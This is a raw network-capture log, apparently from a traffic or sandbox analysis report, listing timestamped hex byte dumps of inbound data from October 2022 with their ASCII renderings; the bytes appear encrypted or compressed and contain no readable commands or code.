                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14360INData Raw: 8d c4 c3 d7 dd da d6 c5 9d bb 23 b7 ed af 0d a6 e0 64 3e d9 57 5d c5 e5 92 93 ef 2c ae 3c 2f 35 75 ef 7b c5 45 35 42 79 c3 25 29 a3 9a ca 5e ac a7 40 be c1 63 04 89 08 3f a8 31 6f 49 d4 90 99 e7 e5 be ba 70 a1 8c cb 32 de 11 54 94 7a 9b 31 cb 0e 0b fb f5 58 f7 6e d8 b0 ca 53 81 35 26 7f 13 0c d8 76 b4 c6 dc f1 27 47 bb c0 25 59 26 89 82 0d 91 3e 70 a7 ed 75 23 38 76 b5 83 dc 51 81 9e 9f 1d 65 2d d5 e3 31 3a bc 3b 4a d8 de 5e a5 9b a7 61 a9 43 04 0e dd 07 38 86 a4 6e 9f 85 10 f6 52 e5 94 e8 5d f2 bf 4d ab 41 cc f2 5d 25 28 2e 0c 5b e3 ab d6 68 f9 42 c7 fa 21 f5 43 e3 6f ec af d2 07 cc 60 b1 5e 35 ac 33 3d bd 8b ec 3a d1 a8 ed 41 3b c2 f3 42 a7 c3 f8 55 75 4e 2b 7e 63 8e c9 6b b8 45 a7 5b 3a d2 91 f6 5d 83 6d af f7 01 f5 c2 f5 7b 1b c3 f0 7b d6 32 6c 8a 07
                                                                                                                                                                                                                                    Data Ascii: #d>W],</5u{E5By%)^@c?1oIp2Tz1XnS5&v'G%Y&>pu#8vQe-1:;J^aC8nR]MA]%(.[hB!Co`^53=:A;BUuN+~ckE[:]m{{2l
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14376INData Raw: fd 7c 50 bd 1c fa 2d 42 02 04 f3 9f f7 33 ad f5 86 d8 a9 c5 44 c2 cd a7 5b ab 75 88 f6 6e 8e 9f e9 be 20 76 9d ab f8 8e 65 9a 7e b9 51 06 a6 73 21 2d be b0 3f f7 f9 d8 51 be a3 91 76 be 3c 7d c9 5a c0 63 88 5c c5 57 d8 7a 35 87 7c ce 2b e8 bf a1 f6 0c 4f 86 63 d2 1d 0e b8 db 7a 27 b8 c9 6e 8a 01 78 66 5c 94 a0 67 35 10 0d ea 00 e4 9e 1d ef 84 cf 5c be 87 8e 49 3a a4 d3 d1 a2 39 28 20 f5 02 9d 25 43 b8 10 4d b6 e6 69 ab ee 9f 04 69 bc 83 ec 5d a9 9c db 36 7f b0 3c 6a e1 af 0b 5f c6 e6 bc 6a 71 58 24 85 16 b5 3a 58 13 82 c5 93 d1 dd 0b 0f 5e 98 ed 1e 1b 8c 2d e9 9b 37 e9 9f 84 0d 34 ce d6 28 69 f6 43 d0 4c fe 28 b9 8b 0f 51 26 2e e1 41 5b dc 42 3c 49 5c ef 16 96 f0 97 d1 cd 17 03 e5 b4 b3 bb b1 bd 25 19 3d cb 2c fa db 7e f3 59 27 58 1a 7c b6 92 19 b7 91 48
                                                                                                                                                                                                                                    Data Ascii: |P-B3D[un ve~Qs!-?Qv<}Zc\Wz5|+Ocz'nxf\g5\I:9( %CMii]6<j_jqX$:X^-74(iCL(Q&.A[B<I\%=,~Y'X|H
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14392INData Raw: 78 b4 bf cd 8d 5a ef 68 42 7a 3f 43 20 8f 0e 3c 9e ac 42 aa 3d 70 5d b7 5c a2 9c 8c de 4a f1 d4 8f 2d 68 de 42 a7 a2 89 e9 a3 9b eb 7a 73 e0 58 db 81 50 9f 75 fa 1e 5c 86 7c 5f 35 e4 8d df 82 58 c3 11 b8 b6 b1 a9 61 25 bf 73 d2 ca 44 67 6e b2 10 28 c9 4a f7 89 32 03 45 17 26 dd f0 92 08 df bc 8f 3a 19 db 9b 98 3b 0e 23 82 1b 57 aa b9 c0 22 c8 f6 c5 33 c1 32 00 6d 06 10 9a 40 66 8b 2d bb 06 52 e3 c8 21 c3 77 17 37 59 e3 93 1f 25 31 41 89 7e 32 3a 38 ea 69 fb 76 c0 1d a5 52 7e a8 92 a6 a3 bb 49 41 79 4d 58 2a f1 30 8e ce ff 8c 55 b7 b2 89 44 c8 2d 79 b2 f7 07 31 48 b1 91 64 a5 e3 90 be 3b 6e c2 2c 6c 3b 81 0e 8b 12 72 da 42 5d 99 10 e0 6b 76 62 75 06 9f 53 75 33 06 c9 b4 d5 c0 b4 b3 c6 77 b8 cb e0 cc 30 ec 26 5e d3 62 82 a3 eb 6c ff 07 40 86 9f 39 02 27 43
                                                                                                                                                                                                                                    Data Ascii: xZhBz?C <B=p]\J-hBzsXPu\|_5Xa%sDgn(J2E&:;#W"32m@f-R!w7Y%1A~2:8ivR~IAyMX*0UD-y1Hd;n,l;rB]kvbuSu3w0&^bl@9'C
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14408INData Raw: 85 f5 88 da 8a db 14 f2 76 bd 2f 11 fc f4 df 92 61 20 67 28 0f 6f d6 ef c1 d9 fd 0d 91 a5 b9 a4 65 61 28 a9 33 9b 1d 13 5d e8 94 0f c6 98 cb aa df 3d f4 69 29 b3 e2 e4 4a 91 8d 55 f8 d4 44 38 e5 b0 67 d3 c9 34 ab a7 94 8d 65 f6 d2 77 96 ed c4 bf 2e 09 f8 5c 72 80 96 1f 1d 5b c9 d9 57 70 6b bb 25 d7 61 22 b1 38 04 33 50 83 fa 13 23 7f f9 1d 00 b4 d2 64 c0 92 c2 26 17 94 5d 5a 56 3a 8e d2 71 d8 e8 4a a0 f0 c3 7e d8 42 7d f7 d2 fb 90 3a a8 3f 11 62 8b aa 3f 08 e3 6e fe 1e ee 5b d8 6b 3f 4f 13 96 d6 60 c4 1f 3e b6 e3 91 1d 01 0d 88 ad 24 1b 73 99 01 f3 fb 3c 3d f3 b0 51 3a f6 b7 5a 4f 83 bb 6f 39 aa 71 ff 14 61 d1 64 de 43 c5 18 88 f0 ee c7 20 9a 9f a1 8b f0 78 5d f1 a0 67 15 27 a1 3e 27 00 5d 83 e6 45 85 bf a8 63 9c 28 b6 b8 63 99 f4 cb 07 67 de e7 ea 73 e1
                                                                                                                                                                                                                                    Data Ascii: v/a g(oea(3]=i)JUD8g4ew.\r[Wpk%a"83P#d&]ZV:qJ~B}:?b?n[k?O`>$s<=Q:ZOo9qadC x]g'>']Ec(cgs
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14424INData Raw: 94 7f b8 be 91 d1 70 70 52 2d 84 15 06 7a ef b3 40 75 ef 94 4e da 54 17 62 3d 07 45 c6 05 54 a0 41 d0 32 51 0e 96 8e 9e 90 41 d1 13 7a e5 96 ea fe 44 53 ea fc dc 8b 6d 4a ce 39 fc 1e af 88 06 34 9b c5 76 dd 81 bc ca a8 bf ef c0 ea 2e 6b 80 77 37 e2 b1 d5 d1 32 e1 d6 7e 74 68 81 19 2b af 08 ce 90 02 49 8f 1a 90 76 f8 0c f4 59 af 2e 2a 85 f9 c3 fe ce 2b 5b 71 e1 a9 36 58 e4 93 bc 0b d3 b5 d8 0a 55 ef 30 73 fa 26 e6 85 c1 6d 54 bb 36 2b 18 0a 30 31 3d 93 16 5a 8a 5b ee c1 31 44 03 e8 08 57 a8 09 a1 70 bc 6a 36 9f a0 c2 d4 05 89 31 9d 2e f1 75 a4 05 8c 28 c5 47 e0 07 d2 29 e9 6f f2 08 1f ea 1a ab 74 61 8d fa 86 b2 eb e9 fa f5 f2 a2 62 8e d5 b0 73 54 f4 86 c4 e4 b3 fe b5 99 56 c3 a4 e9 62 d4 8e ee dd 06 19 be 90 76 12 91 c7 d4 58 60 aa a0 af f8 db cb d3 ee 4a
                                                                                                                                                                                                                                    Data Ascii: ppR-z@uNTb=ETA2QAzDSmJ94v.kw72~th+IvY.*+[q6XU0s&mT6+01=Z[1DWpj61.u(G)otabsTVbvX`J
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14440INData Raw: 1b 9c c5 95 4e 91 a0 c3 5a c3 e1 61 b9 27 3d d3 ae 84 04 87 31 20 33 64 6b cc e4 55 8a 8c 81 bd b7 a6 75 81 c1 7b aa 4d f7 1f fd f0 c0 5c f3 c2 a4 4b f5 fe 0a d7 87 30 2c 4e 80 f7 95 18 b0 d6 12 68 34 f6 94 ab ac 30 37 48 ff e7 5a 14 7e 4c 5e 70 61 d5 d4 8d 4e 8f cb 5e 28 36 fc f9 e2 19 8b 5b e5 a7 97 27 f2 54 0a 4c 2f d1 cf 07 6e fa c7 22 be 83 0b 06 4f a4 4d 0c 02 cb bd dc af 59 8d 5c 30 38 00 af a9 b5 09 55 74 9f e3 c3 39 d9 8a 2e db 58 7d 37 5a 55 d4 b0 9b 7a a7 9c 4a e4 52 74 99 4b c2 02 f3 d2 ab 46 7d de 63 35 4a 5d be 99 57 00 69 18 0b 4e 24 2b 74 dd 7c bc 36 41 b0 6b 9b f7 74 61 cb 9b 71 7a 8b 97 1c 9d 0a 61 1a d8 cb b3 99 76 c5 1c 35 65 88 23 58 88 68 d1 a3 31 17 69 f1 80 bc 4a b8 09 cc e0 e3 2e dd c6 3c b0 71 e6 c6 ad fe e0 a0 40 e4 35 4f 3c 1e
                                                                                                                                                                                                                                    Data Ascii: NZa'=1 3dkUu{M\K0,Nh407HZ~L^paN^(6['TL/n"OMY\08Ut9.X}7ZUzJRtKF}c5J]WiN$+t|6Aktaqzav5e#Xh1iJ.<q@5O<
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14456INData Raw: 1b 1e 7d 06 b9 ee 20 16 ea 4c c6 d7 d5 e9 3a 86 46 ee 93 1a 75 df 42 40 2c 5c e7 05 a9 36 58 0e 5f bb 9f 8d b2 78 94 03 bd 49 d2 50 b4 33 dc 12 43 00 b6 ef 77 39 52 31 05 0d 71 94 9e ac 59 70 87 24 e7 27 7f 7d 6c ec 80 f2 1d b6 52 ef 80 1f 55 ef 84 dc 8b 69 16 99 85 ef b8 d2 fa 7c ce d3 a9 00 b2 28 f9 8e af c4 e9 54 29 95 98 a8 1d 27 d0 6e 91 de 13 cd 71 d4 1f 52 61 41 99 63 28 29 09 d5 c9 7c c2 d9 85 e1 0f 8a 54 fc a7 a0 aa 5b f7 63 04 43 a1 bd a3 9b 74 8b d4 a5 a9 7a 3a ac c0 1a f6 3c 96 e1 93 77 94 57 30 8c a2 6b 6e 2b a0 52 3e 6e 55 c2 bd 6d 6a 90 c3 0c 4b 1e 21 0a 46 de 89 a8 d7 08 87 54 4e 16 0f 48 28 0a ca 2d fb 26 8a 63 6d f0 10 29 c1 e8 37 6e ac ec f9 49 82 d9 13 e2 fd 33 07 1d ce 3d b3 b6 8e a5 c3 72 70 08 63 57 d2 0d 5b ff bd 02 ea b1 72 43 fa
                                                                                                                                                                                                                                    Data Ascii: } L:FuB@,\6X_xIP3Cw9R1qYp$'}lRUi|(T)'nqRaAc()|T[cCtz:<wW0kn+R>nUmjK!FTNH(-&cm)7nI3=rpcW[rC
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14472INData Raw: f6 b2 ea ed bc 41 26 28 00 f3 bd 47 2c 8e 0c a5 cf b0 2c 36 2f b0 9e 4d 8e a4 84 c2 c7 28 c2 9f c9 9f 30 20 89 4f fb 4e 4a e6 bd 8e 69 77 ab 27 5b 1c 6b 5a e0 e0 e9 47 59 1e be 2b 4a f9 bb a1 b5 fb bd 81 4d e9 96 47 34 93 3a a4 e4 47 22 54 f3 85 00 69 64 3f b8 e3 c0 b0 f2 3a 91 a5 11 09 c5 3f 46 49 4e 6c 2e 43 db d3 73 4b 79 01 92 ce 2d 44 16 74 fa 05 74 82 38 33 52 f5 98 71 16 1e c4 90 3f d7 03 9c f4 49 da b1 59 8f cf af d1 db b4 fd 00 b6 4d 78 95 cb fa 29 92 86 ef 26 28 22 d8 47 de a1 37 16 06 cb 67 bf bd c1 8b 0f 86 57 9b c3 17 65 7e fe 21 6c c1 54 3d 9b 3c 95 a7 5d 2c 99 4f 64 b3 5b 54 f5 d6 3d 3e ca 43 1f dc 80 8f 2b 43 2c 7b 5e f0 5e e0 4b 24 9b f8 9e 6d 56 d8 e0 15 c2 cc a0 6f 14 41 c5 00 47 b9 a0 ba 94 01 0b 15 2d b4 cf 7a 75 d2 5b f2 1d 28 6e cc
                                                                                                                                                                                                                                    Data Ascii: A&(G,,6/M(0 ONJiw'[kZGY+JMG4:G"Tid?:?FINl.CsKy-Dtt83Rq?IYMx)&("G7gWe~!lT=<],Od[T=>C+C,{^^K$mVoAG-zu[(n
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14488INData Raw: 6e c1 e8 33 b0 c8 e4 59 cb c6 cf 95 25 ec b0 33 73 3e e6 2d 4f fb e5 47 53 91 e6 f1 fb d5 fe ba 9d 87 9a 19 0b 58 ec 99 66 4a 32 0e 59 2c 4c 15 b7 27 77 8f 37 4a 50 cb 1c 3d ac 0b 89 96 ca 77 3b 84 1d 2d 90 fa db 28 1a 87 db c1 54 59 f8 bf 1e f3 b8 bb 47 8e be 90 da 6a bb 0b 51 78 57 9c 33 34 37 95 69 5c 3b 9a 73 e9 75 c8 7d ff 52 ef 81 6f 25 ef 0d b4 f8 ed 3a f5 9e 26 c9 09 c3 e0 45 6a 30 8b 73 e6 4e 9f 37 29 b4 12 1d bf d1 e5 57 65 8b 9b 7f 74 c9 c5 ca f5 1a 3a 37 7a 96 ca 31 2a 87 82 86 df 25 9e 71 9b a2 71 9f 4d 25 4d ba bb 84 02 92 c6 5f 2b 7d d2 62 36 a6 75 5f 55 cc 0e f8 40 91 3e 17 ff ed 9d da 0b 7e 2e ec de a9 85 2f 32 f6 c2 14 8d be 94 8e 2e 20 5a 25 92 e2 1d 11 37 bc 46 61 5f 5e 96 73 68 aa ba b3 28 20 78 4a 02 e9 2e 70 20 d5 72 09 0e af c9 cb
                                                                                                                                                                                                                                    Data Ascii: n3Y%3s>-OGSXfJ2Y,L'w7JP=w;-(TYGjQxW347i\;su}Ro%:&Ej0sN7)Wet:7z1*%qqM%M_+}b6u_U@>~./2. Z%7Fa_^sh( xJ.p r
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14504INData Raw: 33 58 24 df 15 60 ee 03 b5 cc 07 c5 18 15 58 53 a0 67 6b cf 4d 68 16 6f dc 8b 90 cd 2e 19 26 11 39 4f 5b ea 27 42 55 23 97 c5 d0 29 38 cb 16 2f 5e 0c ec 64 82 4d a0 87 60 a8 b9 2d 27 58 2d df 74 58 28 e2 91 71 a2 11 a3 95 3f 09 27 e1 4d ca 2e aa a4 37 ad f5 cb c7 72 0d 8b c5 39 60 95 78 98 d5 dd 87 46 49 ae 27 c1 50 b6 cc fd 31 ce 69 af 28 69 4d c8 95 db cf 33 ea 4c 3c 4a c1 20 25 45 85 dc 48 2e 8a 4c 51 43 f8 6a c9 56 be b4 8f 9b ba bd 07 a7 a0 4b 61 d1 26 c6 1e d0 37 0f af a9 8c 3c 1f d0 c8 90 19 e1 61 85 24 d7 4b a7 a8 45 4c 21 94 9a 47 8e 89 d2 42 4e ed 9a 39 fe 5b ba 38 2e 1a 1c e9 7f 2b aa ce 67 44 54 8d b8 cd 8c d1 d2 99 48 9b 60 c7 60 c3 d7 2e eb 94 15 34 8c 5f 2e d9 ba eb b2 71 00 ca ff a2 d5 f9 86 6e b0 29 5e e7 8a 61 c5 12 89 2a 87 5f fa 8e d8
                                                                                                                                                                                                                                    Data Ascii: 3X$`XSgkMho.&9O['BU#)8/^dM`-'X-tX(q?'M.7r9`xFI'P1i(iM3L<J %EH.LQCjVKa&7<a$KEL!GBN9[8.+gDTH``.4_.qn)^a*_
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14520INData Raw: d6 ad f3 f3 ef 7b c6 7a c6 82 b8 98 3e 8b c6 b2 2d 25 a0 0c 89 1a a2 26 ae d5 02 e1 df 9a 24 5d 67 26 6b 7d ac c9 d9 ef 3f 8e c9 7c b0 71 6b 1d f6 63 2e e6 5d 26 90 7e 3d e8 b2 cb e3 8f f8 cb 1d db 49 b2 dd 5f 0d ce be b0 9f 6f d1 36 79 1f 63 ce 3b 0f fe 12 bf a8 0d bc 42 6b b0 7b 6f 24 eb d4 27 ee fa 9e de 97 22 5d 0b fc ae 25 ae 30 cd 1a 14 ca b7 0d ce 7b 1e 65 9c f6 a7 60 c6 c7 51 85 a3 af 6d 17 b9 2f 92 2d 02 7e 2e 37 c3 57 59 ab 53 30 39 bb 1e 5c e1 d5 2c 04 d4 84 fd 29 09 97 3c 06 99 07 29 d8 bd 7b a5 a7 57 b9 a1 1b 8d e8 fc 9b e4 57 eb 88 53 15 58 b9 df 49 09 13 43 fa 54 27 d1 b0 71 ff 36 b3 47 65 07 a9 17 d1 43 a7 63 83 ac 24 26 7e da 10 04 51 bb 00 bb 10 4f 06 5d a1 62 e6 19 54 04 14 12 7b 54 84 7a a5 bc f4 96 11 96 9d 09 18 52 4e 24 03 16 5b a8
                                                                                                                                                                                                                                    Data Ascii: {z>-%&$]g&k}?|qkc.]&~=I_o6yc;Bk{o$'"]%0{e`Qm/-~.7WYS09\,)<){WWSXICT'q6GeCc$&~QO]bT{TzRN$[
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14536INData Raw: 9d 93 21 9b b5 cc 9c e0 c0 2b f1 fe b3 67 cd 50 38 7b 02 48 61 12 31 1f db 55 7a b7 89 1c 6e 7d cc 3f cc 42 83 02 f3 82 6a 25 09 a8 83 3d a4 82 2a c1 9a b2 51 0a 4d f8 2b 50 05 e5 56 47 5d ab c9 0b f2 ae 14 01 6b 6d e6 56 f7 d4 72 1c a1 16 40 2a 82 27 98 96 76 c0 53 f3 20 42 7a 28 28 24 02 06 11 a7 d7 1f 35 be c8 d4 c3 5e 8d 9b 94 08 71 cd 3b 71 85 ed 70 26 9d 36 b5 ae cd 1e 38 b4 52 4d 01 2b 2e 76 05 8d 94 f0 40 29 95 1e 05 2f 99 8b b0 47 6a 77 c4 9b 02 82 c5 59 ee d4 2e 04 94 7d 94 95 3d 0b aa 5d 88 39 4f f1 7d c4 ad 87 f3 6b 7b 29 47 6d ca d2 95 df 31 83 4c 9e ca 19 ae 85 a9 29 4a cc 11 d9 a9 3f 84 c4 be b9 14 9b 88 a2 39 64 fe 47 87 12 95 ae 0f 9f 92 8d 14 4e a7 34 ce 8c c4 a0 d9 3e b3 8a 65 80 71 bb 0e 05 bf 60 60 77 2d 26 3a ab f1 dd 0d dd fa 3c e5
                                                                                                                                                                                                                                    Data Ascii: !+gP8{Ha1Uzn}?Bj%=*QM+PVG]kmVr@*'vS Bz(($5^q;qp&68RM+.v@)/GjwY.}=]9O}k{)Gm1L)J?9dGN4>eq``w-&:<
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14552INData Raw: e6 aa 15 7f b1 99 d6 18 6c ca 35 3b 26 b3 dd bc d0 76 23 84 68 65 46 d2 3e 77 2c da 83 3e 85 7c d0 c7 a0 dd ad e6 75 db 32 80 a8 6e e3 c8 7b d1 00 f0 b1 21 e9 9e 83 d2 39 c9 0f d8 0a aa ff 61 19 be 48 fe b6 7d 6d 80 34 ba b4 9f d9 55 89 22 74 61 2d b2 ac 55 be 60 d2 e5 53 91 ab 22 86 d7 a3 bc 89 f6 0a 28 cb a3 26 61 0c 9c 72 e7 2e 85 21 37 3f 24 20 65 0c ab a1 ea 90 6a ac 4d 84 a2 40 cb 69 08 af 59 a3 75 47 d5 ad f5 22 d1 e8 26 9d b9 e0 a2 9c d9 8e 42 93 ae 7c 40 68 81 5a 1d 4c d1 34 4b de ce 67 13 11 24 d1 39 eb d8 6b 84 48 bb 9d 47 ad 1f 7e 63 44 50 e4 50 cc 54 50 83 70 50 b2 71 b2 60 c6 dc ed 77 d1 3b ab 3d 24 59 a0 6d 0f 76 6c df c8 fd f6 02 64 bb cc 91 aa ce 60 08 db fb 5f 07 64 2c 60 0d 30 7a d5 51 3a 2f 78 4d f9 9a cf 0e e1 5e fc ed 65 fc 53 f5 0d
                                                                                                                                                                                                                                    Data Ascii: l5;&v#heF>w,>|u2n{!9aH}m4U"ta-U`S"(&ar.!7?$ ejM@iYuG"&B|@hZL4Kg$9kHG~cDPPTPpPq`w;=$Ymvld`_d,`0zQ:/xM^eS
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14568INData Raw: 92 a1 33 e5 ff b1 1f ba f9 15 44 72 8c c7 06 9a 57 6c 56 5a 16 2f 33 98 5c 11 5a 29 76 13 b3 ad 91 1a bd 05 cb 34 b9 1e 24 32 3a 59 42 70 0e b3 bb 1e 1e 64 c1 a5 bd 72 b5 3b f5 c1 f7 77 2e bb cc ff 58 f6 6a d3 eb 6e e1 21 05 b7 4f a4 e8 b7 a2 98 21 02 15 75 c5 15 a3 62 07 8b a0 70 53 65 96 31 e0 67 4b 34 c4 66 7e 44 22 06 c7 ec 19 4c 9a 23 00 c5 b3 45 3d a9 35 6f b8 9d 0b ad 3f 3d 2d d7 d3 9d 03 ae b1 81 7c 15 27 e1 66 b1 8f 61 cb b5 e1 9a 10 63 1b 38 1f d5 03 d9 c4 44 5c 7f 77 1a ac df ce 69 a7 c8 81 d7 b1 51 6a 64 8d 5e 28 a5 05 58 57 ae bd 41 8e 1a dd 97 1c bc 80 25 62 a0 d0 38 8e 61 97 35 f8 bf 40 60 1a 5f d9 87 af 89 22 e2 b0 92 2e f5 32 93 a7 f9 7b b7 ce 9f 21 7b 50 15 24 2d 7d 24 d2 3e 16 d0 50 87 7d de d5 a5 57 b2 0e 04 d9 e8 92 ef 62 b0 49 2c aa
                                                                                                                                                                                                                                    Data Ascii: 3DrWlVZ/3\Z)v4$2:YBpdr;w.Xjn!O!ubpSe1gK4f~D"L#E=5o?=-|'fac8D\wiQjd^(XWA%b8a5@`_".2{!{P$-}$>P}WbI,
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14584INData Raw: 4c 69 a6 01 e5 76 57 ea 63 12 a4 69 4a bd 24 4a 2c fa 4e 0d 48 2b 20 a2 6f ee ba ce 6e 04 81 7c e2 76 37 33 0d 98 50 d6 5b 8c 07 aa 16 2c 4a 69 2a a4 96 2e 9b 15 94 74 ab 5b eb 52 75 81 6c 6e c7 05 a9 82 8c 88 3b 89 5c 63 56 8e 56 ec 08 01 6a 16 f0 66 d2 26 13 6a 78 28 71 9d ce af 90 39 b1 c2 ac 8c 6a 55 15 44 de 05 8e 5d 65 00 66 e0 a6 3b 56 74 d8 d8 74 e1 81 37 ec 32 d6 33 f0 25 94 ff c0 77 c4 b0 87 f3 21 c6 ba ac 9f 92 55 02 00 75 fd 3c c3 ea 55 42 06 c7 9e 3e db 1b 1e fe 53 bf 1a 84 88 dd 13 a6 59 5c e6 c4 cc 49 80 7c fe 95 bc 6e f8 b9 d6 83 b9 ab d2 7c 03 c7 e4 76 5d 19 95 49 ba ca 6a 10 3b 3d 33 3c 76 32 87 6f 76 b3 a6 cc 2a 22 ba 95 d1 bf bf d8 8e 89 07 c9 5d e3 f1 a8 64 3a d2 50 88 68 78 93 ba 27 fc df bf 31 79 24 45 39 54 81 b4 8c 56 aa 28 04 2a
                                                                                                                                                                                                                                    Data Ascii: LivWciJ$J,NH+ on|v73P[,Ji*.t[Ruln;\cVVjf&jx(q9jUD]ef;Vtt723%w!Uu<UB>SY\I|n|v]Ij;=3<v2ov*"]d:Phx'1y$E9TV(*
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14600INData Raw: 4b 29 c8 9f 58 45 4f 67 6a 6e 31 6b 38 44 a8 3f 0a 74 26 25 2d 28 65 89 3a a3 d8 c3 83 9b 11 dd 8b e5 b4 cf fb 31 07 c4 23 5a 26 60 33 98 82 e3 36 ea 42 e9 31 8b 57 a0 c8 c7 63 14 9e a0 9f be be e7 29 60 55 95 d1 c2 9f bf 4f 73 c5 9f 84 1a 2a d9 9f 91 6d 43 d4 9f b7 a0 b9 27 60 3a 13 dc d7 9f e9 0f 22 23 60 45 e4 c4 23 60 5f c6 e2 25 60 0c 02 08 57 60 b8 b0 71 de 9f 6b b3 47 35 60 39 39 e5 32 60 63 94 bc 2e 60 8e db d5 23 60 70 9e 2f d0 9f e4 3d 4a 20 60 57 85 ac ca 9f 6c 9f 54 0f b9 ed 49 c4 65 7b 9f 90 a7 82 ed 96 d1 21 71 09 65 1d a0 81 2b c0 ab fb 19 84 49 b5 fb 26 c2 bf a3 e1 46 57 ca a9 2c 20 39 ca 96 4d e6 5c 19 cb f6 31 17 4c 29 40 b0 81 5b 8f 37 9a ac 61 56 54 7d 52 d8 17 d2 8e 46 6b db 53 7e a5 ee 6d 08 e6 45 ef 73 08 d9 4b c1 65 12 b9 67 5b 92
                                                                                                                                                                                                                                    Data Ascii: K)XEOgjn1k8D?t&%-(e:1#Z&`36B1Wc)`UOs*mC'`:"#`E#`_%`W`qkG5`992`c.`#`p/=J `WlTIe{!qe+I&FW, 9M\1L)@[7aVT}RFkS~mEsKeg[
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14616INData Raw: 80 60 24 89 8b 64 ab e7 b6 76 a3 fc 2d b8 0a 34 9c 7b d7 ab 58 78 a0 a8 cf 88 b4 75 9f df e0 45 3d c5 c2 79 24 45 03 fd dc ae 84 81 8d 5a cf 03 01 92 ef be 4d c3 2a d6 3e 7a 7a 74 02 c5 b9 45 89 29 ce 18 74 2b 21 8e c2 88 bd 91 5a 81 b6 e8 06 b0 67 f0 d3 62 6e 95 f9 32 5e fd a4 22 e0 13 8c 8b d3 42 88 83 86 ea bf 90 34 1b 92 6d cc d7 c4 32 ff 21 53 67 26 ad 6d 55 3a 00 c9 3f 50 cf ff f5 3e f2 97 6b 91 c0 36 11 6d 8f fe ea 1a 50 a2 9d aa 64 3c 56 0a 26 0b a1 f6 01 aa 7e 67 1a 9b 88 71 ce d6 dd ce 3b d0 c6 8f ff d1 e1 0d 27 b2 40 60 b4 2c d3 6b 99 39 6c 82 fb b3 ec 9d bd f4 48 41 89 e0 96 0b 15 39 88 39 52 fe 74 de 44 b3 48 08 ce 9d 0e 36 45 f3 64 a1 7d d5 3f 0b 0e f5 1b aa e7 9e d8 64 a8 a3 ba 24 40 e5 d6 e4 37 85 cf a8 79 9b bd 51 99 d6 f4 69 f6 19 aa 62
                                                                                                                                                                                                                                    Data Ascii: `$dv-4{XxuE=y$EZM*>zztE)t+!Zgbn2^"B4m2!Sg&mU:?P>k6mPd<V&~gq;'@`,k9lHA99RtDH6Ed}?d$@7yQib
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14632INData Raw: 67 4d 45 8d ae 1e bd ff a6 c1 2e 49 aa 65 ec fd 22 73 90 07 08 c4 81 be 83 ec 5e ac b9 f3 2c 01 00 00 82 6e 58 b8 7f fa 0f 0b c5 f5 39 df cd b1 9f 8b 09 70 7c bd 3f 48 ed 43 40 79 96 f8 db 56 97 73 2e b5 3f 24 c2 6a 8e a4 d4 6d 13 49 20 62 89 7b 3a 71 d5 2a 41 a0 98 c9 a6 05 52 25 1b 0a d3 01 00 00 80 81 70 49 80 e4 15 02 4d a0 1b 78 0c 4b 40 dc 17 e6 b3 ff c1 da dd 4e 20 33 a5 65 b5 df 34 63 26 b2 1f 6d 0d 9b bf 5f 8f fc 53 48 60 6e 1c 9d 4b c0 1e 37 78 42 60 4c 69 2f b5 3f 66 a3 51 b1 5f 8b f6 5f b7 bf 4c 81 b5 4f 00 13 1c 8e b2 df e7 4b 36 49 20 ce 9d 75 4e e0 f7 a3 c8 43 a0 ad 2e 69 03 64 45 08 5c 0b 43 b1 41 3a f3 a0 fd 6a 12 3c fb c4 c1 94 ac 32 b7 ef 18 6a b6 63 90 a6 ac 75 4c d2 05 bf 5a 76 20 26 4c 60 63 d5 25 84 52 ce b0 d5 2e df d1 c0 5a 56 d7
                                                                                                                                                                                                                                    Data Ascii: gME.Ie"s^,nX9p|?HC@yVs.?$jmI b{:q*AR%pIMxK@N 3e4c&m_SH`nK7xB`Li/?fQ__LOK6I uNC.idE\CA:j<2jcuLZv &L`c%R.ZV
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14648INData Raw: bf ef 50 5c 39 60 21 45 b2 bf 01 00 00 20 b7 5a 57 d7 a6 19 bf 66 cb b0 38 80 79 85 53 39 0a 3b d5 66 a3 f0 cb 20 22 d8 0d ac 0f ce 83 f8 48 4e c6 1f 77 e5 30 60 2d 55 8f 46 60 20 10 34 ce 86 6d 65 34 9a 5b 67 b5 81 ed db 52 10 23 60 a3 0b 48 40 01 00 00 10 f8 db 51 d7 7d 7c 4d e7 33 a7 80 0a 19 fd 10 ce f5 42 8c 35 15 12 f5 45 67 a7 dc 36 b7 4f ab a1 4e a0 25 5e 08 79 25 71 9a 4c 40 fe ff ff ff bc 9f 5b d7 a6 3f 9d e3 03 78 15 fe 26 12 f9 f5 dc 2b 29 3a b4 af fe 4b 9b c2 ab d8 e0 68 b2 2b 73 92 df f1 fb a0 88 df e1 d3 05 59 c7 bc a1 cc d1 15 e0 05 59 60 2b 9e 12 ef 5d b5 71 4a 62 25 32 17 d0 76 7e e4 9f 35 bb 67 7f ff 93 e8 ef ff 4b 9b 42 bc ae b1 28 bd 29 62 d3 9f bf 6a a3 e6 42 46 49 d7 ed 7f 56 db f5 40 cb 55 20 ac 70 a0 e6 4c 48 ab 22 0b bf 12 79 1c
                                                                                                                                                                                                                                    Data Ascii: P\9`!E ZWf8yS9;f "HNw0`-UF` 4me4[gR#`H@Q}|M3B5Eg6ON%^y%qL@[?x&+):Kh+sYY`+]qJb%2v~5gKB()bjBFIV@U pLH"y
